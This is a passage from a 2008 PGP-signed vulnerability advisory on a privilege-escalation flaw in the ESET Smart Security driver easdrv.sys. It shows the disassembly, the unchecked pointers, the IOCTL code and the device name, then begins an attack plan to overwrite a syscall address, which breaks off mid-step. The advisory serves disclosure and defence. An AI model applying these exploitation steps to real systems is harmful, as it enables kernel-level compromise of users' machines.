1 −−−−−BEGIN PGP SIGNED MESSAGE−−−−−
2 Hash: SHA1
3
4 − − Orange Bat advisory −
5
6 Name
: ESET Smart Security 3.0.667.0
7 Class
: Privilage escalation
8 Published
: 2008−08−14
9 Credit
: g_ (g_ # orange−bat # com)
10
11 − − Details −
12
13 File: easdrv.sys
14
15 .text:00012B92 loc_12B92:
16 .text:00012B92 push [ebp+InputBuf]
17 .text:00012B95 call ds:off_1A200[eax]
18 .text:00012B9B mov ecx, [ebp+OutputBuffer]
19 .text:00012B9E mov [ecx], eax
20
21 Although this piece of code is wrapped with exception handler,
22 input and output pointers are not checked with ProbeForRead/Write.
23 This will cause BSOD when input/output will point to kernel mode
24 memory (above 0x80000000).
25
26 This code can be reached by sending IoControlCode = 0x222003 to
27 device \\.\\easdrv (see POC). In order to exploit this, we need
28 to take a look at
29
30 .text:00012B95 call ds:off_1A200[eax]
31
32 off_1A200 is:
33
34 .rdata:0001A200 off_1A200 dd offset HookNtClose
35 .rdata:0001A204 dd offset sub_12838
36 .rdata:0001A208 dd offset sub_12874
37 .rdata:0001A20C dd offset sub_128A8
38 .rdata:0001A210 dd offset sub_128E4
39 .rdata:0001A214 dd offset sub_1290A
40 .rdata:0001A218 dd offset sub_1292C
41
.
42
.
43
.
44
45 These are wrappers for hooked syscalls. First one is NtClose, so
46 there aren’t many possible values that this API returns in eax.
47 We will use:
48
49 C0000008
STATUS_INVALID_HANDLE
An invalid HANDLE was specified.
50
51 Because it’s the simplest status to get.
52
Page 1/5
ESET Smart Security 3.0.667.0 Privilege Escalation PoC
g_
08/16/2008
53 Attack scenario:
54
55 1. Get address of some rarely used syscall, like NtShutdownSystem.
56 I will refer to this address as X :p
57 2. Send signal to easdrv, with output buffer = X−1. This will result
58 in overwriting two